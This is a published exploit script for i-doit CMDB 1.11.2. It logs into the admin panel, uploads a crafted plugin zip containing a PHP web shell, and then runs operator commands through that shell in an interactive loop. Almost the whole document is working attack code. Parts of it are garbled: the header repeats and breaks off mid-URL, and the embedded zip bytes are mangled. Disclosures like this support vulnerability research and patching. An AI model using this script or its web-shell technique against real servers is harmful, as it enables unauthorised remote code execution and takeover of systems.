i-doit CMDB 1.11.2 Remote Code Execution

# Exploit Title: i-doit CMDB 1.11.2 - Remote Code Execution
# Date: 2018-12-05
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: ht # Exploit Title: i-doit CMDB 1.11.2 - Remote Code Execution
# Date: 2018-12-05
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://www.i-doit.org/i-doit-open-1-11-2/
# Version: v1.11.2
# Category: Webapps
# Tested on: XAMPP for Linux 5.6.38-0
# Software Description : The IT-documentation solution i-doit is based on a
# complete open
# source configuration management and database. Using i-doit as a CMDB you
# can manage your IT according to ITIL best practices and configurate the significant
# components of your IT environment
# Description : This application has an upload feature that allows an
# authenticated user with administrator
# roles to upload arbitrary files to the main website directory.
# ==================================================================
# PoC: Exploit upload the ".php" file in the ".zip" file to Remote Code Execution.
# i-doit accepts zip files as a plugin and extract them to the main
# directory. In order for the ".zip" file to be accepted by the application, it must
# contain a file named "package.json

#!/usr/bin/python

import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore

print
" ############################################################################"
print "# i-doit CMDB & ITSM 1.11.2 Remote Code Execution - Remote Code Execution #"
print "# Vulnerability discovered byvAkkuS #"
print "# My Blog - https://www.pentest.com.tr #"
print
"############################################################################ "
if (len(sys.argv) != 2):
print "[*] Usage: poc.py <RHOST>"
exit(0)

rhost = sys.argv[1]

# User Information Input
UserName = str(raw_input("User Name: "))
Password = str(raw_input("Password: "))

# Login into site
print(Fore.BLUE + "+ [*] Loging in...")
br = mechanize.Browser()
br.set_handle_robots(False)

# Cookie Jar
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)

br.open("http://"+rhost+"/admin/")
assert br.viewing_html()
br.select_form(nr=0)
br.form['username'] = UserName
br.form['password'] = Password
br.submit()

title = br.title()
print (Fore.YELLOW + "+ [*] You're in "+title+" section of the app now")

# Arbitrary ".php" File Upload Records with multipart/form-data to RCE
rce_headers = {"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data;
boundary=---------------------------13859713751632544601258659337"}
rce_data="-----------------------------13859713751632544601258659337 Content-Disposition:
form-data;
name="action" add -----------------------------13859713751632544601258659337 Content-Disposition:
form-data;
name="mandator" 0 -----------------------------13859713751632544601258659337 Content-Disposition:
form-data; name="module_file"; filename="test.zip" Content-Type:
application/zip PKx03x04x14x00x08x00x08x00x06x89x85Mx00x00x00x00x00x00x00x00x00x00x00x00x0cx00
x00package.jsonUT x00x07xccxdbx07\xccxdbx07\xccxdbx07\uxx0bx00x01x04x00x00x00x00x04x00x00x00x00x03x00PKx07x08x00x00x00x00x02x00x00x00x00x00x00x00PKx03x04x14x00x08x00x08x00Gx87{Mx00x00x00x00x00x00x00x00xdcx01x00x00 x00
x00shell.phpUT x00x07wMxfd[7x81x07\wMxfd[uxx0bx00x01x04x00x00x00x00x04x00x00x00x00x95x91xcbjxc30x10Exf7xfax8axc1x18,xd3xe6x0bxd2G6I)dx15xb2+ex10xf2xb8x16xd1#xxe4<x08xf9xf7:x8dxe3xb8Mxbbxe8JHxf7xcexbdgxd0xc3xf3xbaZx8b4Vx86xb14x96xe0x11x10gxafxf3)xe2XLxxcfx91x9cLtxe5Bx01xcdGx18mxe1xeaMxf2ox16x15c wxe6x87!xd5xc19xe5x8b68xc5x97xe9xf2-xd1xaeHxdexc7Bx98x12xa4xb6x8ax19ig8xb2xccx16TZxd2xd1x04?kxfcxd7x99xe59x1cx84x00x80xb4xecx9exda
O[xb8xf5xcaxecxccx92xb5xadxc3x81xd1x93xf1x9bxb0"yAiuqx04xb2L'x84x8bxadxa7xd0xcaZlx98j<Ixa8xeaZxedxafx1cxbfxa9}xf3=x9cxef}xd3xbfxaaxfe*x19xc4xdfxaexd0Mtxdf0xd0x8fxe2x13PKx07x08xc6=x06kxdex00x00x00xdcx01x00x00PKx01x02x14x03x14x00x08x00x08x00x06x89x85Mx00x00x00x00x02x00x00x00x00x00x00x00x0cx00
x00x00x00x00x00x00x00x00x00xa4x81x00x00x00x00package.jsonUT x00x07xccxdbx07\xccxdbx07\xccxdbx07\uxx0bx00x01x04x00x00x00x00x04x00x00x00x00PKx01x02x14x03x14x00x08x00x08x00Gx87{Mxc6=x06kxdex00x00x00xdcx01x00x00 x00
x00x00x00x00x00x00x00x00x00xa4x81\x00x00x00shell.phpUT x00x07wMxfd[7x81x07\wMxfd[uxx0bx00x01x04x00x00x00x00x04x00x00x00x00PKx05x06x00x00x00x00x02x00x02x00xb1x00x00x00x91x01x00x00x00x00 -----------------------------13859713751632544601258659337-- "

upload = requests.post("http://"+rhost+"/admin/?req=modules&action=add",
headers=rce_headers, cookies=cj, data=rce_data)
# Upload Control
if upload.status_code == 200:
print (Fore.GREEN + "+ [*] Shell successfully uploaded!")

# Command Execute
while True:
shellctrl = requests.get("http://"+rhost+"/shell.php")
if shellctrl.status_code == 200:
Command = str(raw_input(Fore.WHITE + "shell> "))
URL = requests.get("http://"+rhost+"/shell.php?cmd="+Command+"")
print URL.text
else:
print (Fore.RED + "+ [X] Unable to upload or access the shell")
sys.exit()

# end